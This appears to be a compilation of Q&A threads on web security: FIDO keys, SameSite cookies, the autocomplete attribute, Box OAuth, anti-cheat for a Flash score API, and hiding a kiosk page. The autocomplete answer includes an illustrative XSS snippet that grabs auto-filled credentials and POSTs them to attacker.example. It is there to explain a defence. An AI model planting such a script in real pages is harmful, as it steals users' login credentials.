Since FIDO keys have no displays, you can only use them to authenticate yourself, not to authorize some action (you don't know what action you'd be authorizing).
Or, if you do want to authorize something, you have to trust your browser to display the same thing it will submit for authorization once you press the button on the FIDO key - but then I wonder why you need a hardware key at all, rather than just fully trusting your browser with your keys.
So I somehow fail to see the usefulness of FIDO keys. Can someone enlighten me, please?
Even for a simple example like logging in to my email account - shouldn't that require something better than just authentication? As soon as I've logged in, an attacker who controls my browser (the browser acting as a man-in-the-middle) can stay logged in forever, add a forwarding rule to intercept all my emails, and so on.
All this because the FIDO keys would become inconveniently large if they had to include a display? Then why not just add a headphone jack, and at least tell me via text-to-speech what I'm authorizing?
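To make the point concrete, here is a minimal sketch of what a login looks like through the WebAuthn browser API (`navigator.credentials.get`), which is how FIDO keys are driven; the option names are standard WebAuthn, everything else is illustrative:

```typescript
// A minimal WebAuthn assertion: the key signs an opaque challenge
// supplied by the server. Nothing in what the key sees describes
// the action shown on screen.
async function signChallenge(challenge: Uint8Array): Promise<Credential | null> {
  return navigator.credentials.get({
    publicKey: {
      challenge,              // opaque bytes; the key cannot know what they mean
      timeout: 60_000,
      userVerification: 'preferred',
    },
  });
}
```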
Beginning with Chrome 80, third-party cookies will be blocked unless they carry the attributes SameSite=None and Secure, with None being a new value for the SameSite attribute. https://blog.chromium.org/2019/10/developers-get-ready-for-new.html
The above blog post states that Firefox and Edge plan on implementing these changes at an undetermined date, and there is a list of incompatible clients here: https://www.chromium.org/updates/same-site/incompatible-clients.
What would be the best practice for handling this situation for cross-browser compatibility?
An initial thought is to use local storage instead of a cookie but there is a concern that a similar change could happen with local storage in the future.
You hit on a good point: as browsers move towards stronger methods of preserving user privacy, sites need to reconsider how they handle data. There's definitely a tension between the composable/embeddable nature of the web and the privacy/security concerns of that mixed content. I think this is currently coming to the foreground in the conflict around fingerprinting: the vectors being locked down to prevent user tracking are often the same signals sites use to detect fraud. It's the age-old problem that if you have perfect privacy for "good" reasons, then all the people doing "bad" things (like cycling through a batch of stolen credit cards) also have perfect privacy.
Anyway, outside the ethical dilemmas of all this, I would suggest finding ways to encourage users to have an intentional, first-party relationship with your site/service whenever you need to track some kind of state for them. It feels like a generally safe assumption to code as if all storage will eventually be partitioned and as if any form of tracking will require informed consent. If that's not the direction things go, I still think you will have created a better experience.
In the short term, there are some options at https://web.dev/samesite-cookie-recipes:
Use two sets of cookies, one with the new attributes and one legacy set without them, to catch all browsers (see the sketch after this list).
Sniff the user agent and return the appropriate headers to each browser.
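A minimal sketch of the double-cookie recipe, assuming an Express-style Node server (the cookie names follow the web.dev article; everything else is illustrative):

```typescript
import express from 'express';

const app = express();

// Set the same value twice: modern browsers use the cookie with the
// new attributes, while older clients that mis-handle SameSite=None
// ignore it and fall back to the legacy cookie.
app.get('/embed', (req, res) => {
  const session = 'opaque-session-value';
  res.cookie('3pcookie', session, { sameSite: 'none', secure: true });
  res.cookie('3pcookie-legacy', session, { secure: true }); // no SameSite attribute
  res.send('widget content');
});
```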
You can also maintain a first-party cookie, e.g. SameSite=Lax or SameSite=Strict, that you use to refresh the cross-site cookies when the user visits your site in a top-level context. For example, if you provide an embeddable widget that shows personalised content, then when no cookies are present you can display a message in the widget linking the user to the original site to sign in. That way you're explicitly communicating to your user the value of allowing them to be identified across this site boundary.
For a longer-term view, you can look at proposals like HTTP State Tokens, which outlines a single, client-controlled token with an explicit cross-site opt-in. There's also the isLoggedIn proposal, which provides a way of indicating to the browser that a specific token is used to track the user's session.
I know what the autocomplete attribute is and how to use it, but I don't get the point of it!
I mean, why should I set autocomplete='off' as a developer?
Are there any security benefits to it, or something?
Yes, it's a security feature. Imagine this scenario:
Your website fell victim to an XSS attack (e.g. somebody was able to implant a piece of JavaScript in your page without your knowledge).
Your website also has username/password fields, and when a user opens the page, the malicious script immediately grabs the auto-filled values and sends them off to the attacker's server.
Granted, the XSS itself is not mitigated by disabling auto-complete, but at least it prevents credentials from being stolen merely because somebody with saved form data loads the page. It requires them to at least type in their credentials.
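A hypothetical sketch of that scenario, to make it concrete - the field ids and the collection URL are made up for illustration:

```typescript
// Injected script: wait for the browser to auto-fill the login form,
// then exfiltrate the values without the victim typing anything.
window.addEventListener('load', () => {
  const user = document.querySelector<HTMLInputElement>('#username')?.value;
  const pass = document.querySelector<HTMLInputElement>('#password')?.value;
  if (user && pass) {
    void fetch('https://attacker.example/collect', {
      method: 'POST',
      body: JSON.stringify({ user, pass }),
    });
  }
});
```

With autocomplete="off" on those inputs, the values simply aren't there until the victim types them.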
Also, there is the rather obvious scenario of somebody gaining physical access to your machine and then being able to auto-complete their way into your accounts.
Does anyone know why Box.com makes it so hard to generate an authorization code programmatically? I wrote some code to do this through screen-scraping, and recently it broke because (as far as I can tell) one HTTP request parameter changed from [root_readwrite] to root_readwrite. I was able to fix it reasonably quickly (thank you, Fiddler), but why make developers go to this trouble?
Judging by the number of questions on this topic, many developers need to do this, presumably for good reason, and I don't think it can be prevented, so why not just embrace it?
Thanks for listening, Martin
The issue with doing OAuth programmatically is that it would effectively defeat the point of OAuth. Users are supposed to be presented with the Box login page so that they never have to give their username and password directly to your app. This allows users to see what permissions your app has over their account (the scope) and also allows them to revoke your app at any time.
Doing login programmatically means that at some point your app knows the user's password. This requires that the user trusts you to not do anything malicious, which usually isn't feasible unless you're a well-trusted name. The user also has to trust that you handle their credentials correctly and won't use them in an insecure way.
Box wants to encourage developers to do authentication the correct and secure way, and therefore isn't likely to support doing OAuth programmatically. You should really try to perform login the supported way by going through the Box login page.
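For reference, the supported flow is short; a sketch assuming Box's standard OAuth2 endpoints (the client credentials and redirect URI are placeholders for your app's registered values):

```typescript
const CLIENT_ID = 'YOUR_CLIENT_ID';         // placeholder
const CLIENT_SECRET = 'YOUR_CLIENT_SECRET'; // placeholder, keep server-side
const REDIRECT_URI = 'https://yourapp.example/callback';

// 1. Send the user's browser here; Box shows its own login and consent
//    page, so your app never sees the password.
const authorizeUrl =
  'https://account.box.com/api/oauth2/authorize' +
  `?response_type=code&client_id=${CLIENT_ID}` +
  `&redirect_uri=${encodeURIComponent(REDIRECT_URI)}`;

// 2. Box redirects back with ?code=...; exchange it server-side.
async function exchangeCode(code: string) {
  const res = await fetch('https://api.box.com/oauth2/token', {
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: new URLSearchParams({
      grant_type: 'authorization_code',
      code,
      client_id: CLIENT_ID,
      client_secret: CLIENT_SECRET,
    }),
  });
  return res.json(); // access_token, refresh_token, etc.
}
```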
Over the years I've become an uber-nerd when it comes to Flash game development. Now I'm thinking about using my skills to help other game developers out there.
I want to develop an API in AS3 which will allow the developer to do (as a start) the following:
Display a dialogue which lets the user log into their "account" (hosted on my site).
Send a score/value to the website and attribute it to the logged in user.
Unlock an achievement (achievements will be set up by the developer in the web interface, which is where they will also get a key of some type to use with the API).
Display high scores, other players' profiles in-game, etc. (show basically any stats in-game).
All easy enough to develop straight off the bat. However, where it becomes frustrating is security. I'm not expecting an indestructible solution - I'm fully aware that isn't possible - but what would be the most defensive way to approach this?
Here are the issues that I can think up on the spot:
The big one - people stealing the API key via a man-in-the-middle attack.
Highscore injection, false achievement unlocks.
Decompiling the SWF and stealing the API key.
Using the API key to create a dummy flash application and send random data like highscores.
Altering the API itself so you don't need to be logged in, etc.
One thought I've had is converting my API to a component so there's no access to the code (unless you decompile it). The problem here is that it's just not friendly to the developers, though it would allow me to create my own graphics for the UI (rather than coding many, many sprites).
Private/public keys won't work unless there is very good protection against decompiling.
I'm beginning to wonder if this idea is a dead end.
Any advice on securing this (or parts of it) would be great.
Look at this thread first if you haven't done so already: What is the best way to stop people hacking the PHP-based highscore table of a Flash game
Against man-in-the-middle attacks, HTTPS seems the only option. It may have its vulnerabilities, but it's way better than any home-made solution. The problem is that you'll need an actual certificate from a recognized certificate authority, because the ActiveX-based Flash plugin will not trust a self-signed certificate.
Highscore injection and false achievement unlocks: should not be possible without decompilation.
SecureSWF with reasonably high settings (code execution path obfuscation and encrypted strings) should beat most decompilers. Sure, the SWF can still be examined with a hex editor, but that will require a very determined hacker.
A dummy Flash application built on a stolen API key: again, should not be possible without decompilation.
Altering the API itself: the API should live on the server, and every API function should require a user context (loaded over HTTPS).
Also add encryption to Flash shared objects/cookies. I once successfully altered some savegames with a simple hex editor, because they were just objects in AMF format. The encryption will only hold as long as the SWF resists decompilation, but since we are using SecureSWF... Or move savegames to the server (see the signing sketch below).
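If saves do round-trip through your server, a cheaper alternative to encryption is to make them tamper-evident; a minimal sketch in Node (the secret and the blob format are illustrative):

```typescript
import { createHmac, timingSafeEqual } from 'node:crypto';

const SECRET = process.env.SAVE_SECRET ?? 'dev-only-secret'; // placeholder

// Attach an HMAC tag to the serialized savegame before sending it
// to the client.
function sign(save: string): string {
  const tag = createHmac('sha256', SECRET).update(save).digest('hex');
  return `${tag}.${save}`;
}

// When the save comes back, recompute the tag; a hex-edited save
// no longer matches and is rejected.
function verify(blob: string): string | null {
  const dot = blob.indexOf('.');
  if (dot < 0) return null;
  const tag = Buffer.from(blob.slice(0, dot), 'hex');
  const save = blob.slice(dot + 1);
  const expected = createHmac('sha256', SECRET).update(save).digest();
  return tag.length === expected.length && timingSafeEqual(tag, expected)
    ? save
    : null;
}
```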
The client side is never secure enough, so I'd suggest moving all the logic to the server, reducing the client to just a UI.
If that's impossible due to network timeouts, send scores/achievements only together with a log of "user_action - game_state" pairs and verify it on the server, as in the sketch below.
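A minimal sketch of that verification step - the action types and scoring rules are hypothetical; the point is that the server recomputes the score from the log instead of trusting a number the client sends:

```typescript
// Hypothetical action log entries reported by the client.
type Action =
  | { kind: 'collect_coin' }
  | { kind: 'defeat_enemy'; enemyLevel: number };

// Replay the log server-side with the real game rules.
function replayScore(log: Action[]): number {
  let score = 0;
  for (const action of log) {
    switch (action.kind) {
      case 'collect_coin':
        score += 10;
        break;
      case 'defeat_enemy':
        score += 50 * action.enemyLevel;
        break;
    }
  }
  return score;
}

// Accept a submission only if the replayed score matches the claim
// (ideally also checking that the log itself is physically plausible).
function acceptSubmission(log: Action[], claimedScore: number): boolean {
  return replayScore(log) === claimedScore;
}
```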
I have a page that is just a non interactive display for a shop window.
Obviously, I don't link to it, and I'd also like to avoid people stumbling across it (by Google etc).
It will always be powered by Chrome.
I have thought of...
Checking User Agent for Chrome
Ensuring the resolution is 1920 x 1080 (not that useful, as it is a client-side check)
Banning under robots.txt to keep Google out of it
Do you have any more suggestions?
Should I not really worry about it?
Not that I would EVER recommend what I'm about to suggest - how about filtering by IP address? Since your provider's IP is rarely going to change, you can kick out or deny requests from IP addresses other than yours - maybe a clean redirect to http://www.google.com or something silly like that. Although I would still suggest locking it down with a login and password and just having it write a never-expiring cookie. That's still not a great idea, but a shy bit better than the road you're trucking down right now.
You could always limit the connections by IP address (if you know it ahead of time and it's reliable):
Apache's access control
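If the page happens to be served by a Node app instead of Apache, the same idea as a hedged sketch (the shop address is a placeholder from the documentation range):

```typescript
import express from 'express';

const SHOP_IP = '203.0.113.7'; // placeholder: the shop's static address

const app = express();

// Server-side allowlist: unlike a client-side JavaScript redirect,
// this cannot be bypassed by the visitor.
app.use((req, res, next) => {
  if (req.ip !== SHOP_IP) {
    res.status(404).end(); // pretend the page doesn't exist
    return;
  }
  next();
});
```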
If it is just for a shop window, do you even need access to a web page?
You can host the file locally.
Personally, I wouldn't worry about it; if no one is linking to it externally, it is unlikely ever to be found by search engines.